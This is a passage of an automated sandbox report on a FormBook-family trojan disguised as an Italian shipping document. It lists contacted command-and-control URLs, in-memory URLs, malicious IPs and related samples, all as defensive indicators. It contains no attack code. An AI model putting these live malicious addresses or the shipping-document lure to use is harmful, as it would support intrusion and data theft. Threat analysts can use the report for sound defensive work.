                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.albero-dveri.online/vyk8/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sppsuperplast.online/og3c/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/c45k/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.wdeb18.top/66vh/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.trapkitten.website/0dae/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.uburn.xyz/unks/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.2bhp.com/znmp/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabtaskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_autopSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dts.gnpge.comtaskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://reg.rupSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=nspSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2BQUT7WmgpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.consentmanager.netpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/pics/28903/search.png)pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMupSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtaskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.netpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://delivery.consentmanager.netpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.albero-dveri.onlinepSySrLvnviNdEH.exe, 00000005.00000002.3600066837.0000000008F64000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://jino.rupSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000007830000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006380000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotaskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/display.cfmpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lanpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.ecosia.org/newtab/taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.Palcoconnector.netpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMupSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.tmstore.click/pk64/?4rl8h=D2LpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006EC4000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000005A14000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.00000000370A4000.00000004.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/pics/29590/bg1.png)pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/js/min.js?v2.3pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixpSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      67.223.117.189
                      		www.uburn.xyzUnited States
                      		15189VIMRO-AS15189UStrue
                      206.119.82.147
                      		wdeb18.topUnited States
                      		174COGENT-174UStrue
                      208.91.197.27
                      		www.palcoconnector.netVirgin Islands (BRITISH)
                      		40034CONFLUENCE-NETWORK-INCVGtrue
                      81.88.63.46
                      		www.2bhp.comItaly
                      		39729REGISTER-ASITtrue
                      195.161.68.8
                      		www.trapkitten.websiteRussian Federation
                      		8342RTCOMM-ASRUtrue
                      54.179.173.60
                      		dns.ladipage.comUnited States
                      		16509AMAZON-02UStrue
                      194.58.112.174
                      		www.albero-dveri.onlineRussian Federation
                      		197695AS-REGRUtrue
                      85.159.66.93
                      		natroredirect.natrocdn.comTurkey
                      		34619CIZGITRtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1515429
                      Start date and time:2024-09-22 18:00:34 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 23s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:AWB_5771388044 Documenti di spedizione.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/2@9/8
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 92%
                      • Number of executed functions: 51
                      • Number of non-executed functions: 305
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:02:46API Interceptor5995264x Sleep call for process: taskkill.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      67.223.117.189ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • www.uburn.xyz/unks/
                      DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                      • www.heldhold.xyz/fava/
                      LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                      • www.techstone.top/d5fo/
                      Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                      • www.nodedev.top/wnsq/
                      ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                      • www.akissdove.xyz/8ntn/
                      OrderPI.exeGet hashmaliciousFormBookBrowse
                      • www.helidove.xyz/no40/
                      PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                      • www.nodedev.top/wnsq/
                      Scan405.exeGet hashmaliciousFormBookBrowse
                      • www.bandbid.top/38gc/
                      ScanPDF_102.exeGet hashmaliciousFormBookBrowse
                      • www.bandbid.top/38gc/
                      SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
                      • www.nodedev.top/o93t/
                      206.119.82.147ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • www.wdeb18.top/66vh/
                      208.91.197.27RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                      • www.yourhomecopilot.online/jdoy/
                      LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                      • www.willtriallawyers.net/ccld/
                      SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                      • www.kevin-torkelson.info/gekb/?6JAhxhQ=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRXHq/o1z6msqN7u+hXpr/iyZ69h0d/sxUWlEUDMB6KnnnBA==&In3=AzvpidDp
                      2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                      • www.kevin-torkelson.info/gekb/?mnShvP=5z2j4JvjBCmnxDGmURgdSy3xK1+MU+efumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRExD4swvGjZDWs+2yQq3jiVda6yM//tNBSW8=&Cbj=nB9LWdWpMT7tUBt
                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • www.palcoconnector.net/c45k/
                      PO098765678.exeGet hashmaliciousFormBookBrowse
                      • www.inastra.online/55bv/
                      SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                      • www.kevin-torkelson.info/gekb/?RD4=5z2j4JvjBCmnxDGmURgdSy3xK1+MU+efumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRExD4swvGjZDWs+2yQq3jiVda6yM//tNBSW8=&VzA=dz5HvTSP4ZdlFHDP
                      EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                      • www.palcoconnector.net/2d2p/
                      EfzTOF4PQ1.exeGet hashmaliciousFormBookBrowse
                      • www.nothing-but.online/by21/?Mvgh0t6=KkYALMB0NG3R+OmuYIDrEEe2c3kIF+/sYfEO/ahGURjVRU4nb7zvxCrfeYFQ9NeV87Ux&WRUl2=GdeD
                      Payment Advice.exeGet hashmaliciousFormBookBrowse
                      • www.bfiworkerscomp.com/xzzi/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.albero-dveri.onlineRECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                      • 194.58.112.174
                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 194.58.112.174
                      September Order.exeGet hashmaliciousFormBookBrowse
                      • 194.58.112.174
                      dns.ladipage.com2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                      • 54.179.173.60
                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 54.179.173.60
                      PO098765678.exeGet hashmaliciousFormBookBrowse
                      • 18.139.62.226
                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                      • 13.228.81.39
                      Shipping report#Cargo Handling.exeGet hashmaliciousFormBookBrowse
                      • 13.228.81.39
                      PO76389.exeGet hashmaliciousFormBookBrowse
                      • 13.228.81.39
                      SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                      • 18.139.62.226
                      r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                      • 13.228.81.39
                      SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                      • 13.228.81.39
                      3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                      • 18.139.62.226
                      www.trapkitten.websiteSecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                      • 195.161.68.8
                      2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                      • 195.161.68.8
                      SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                      • 195.161.68.8
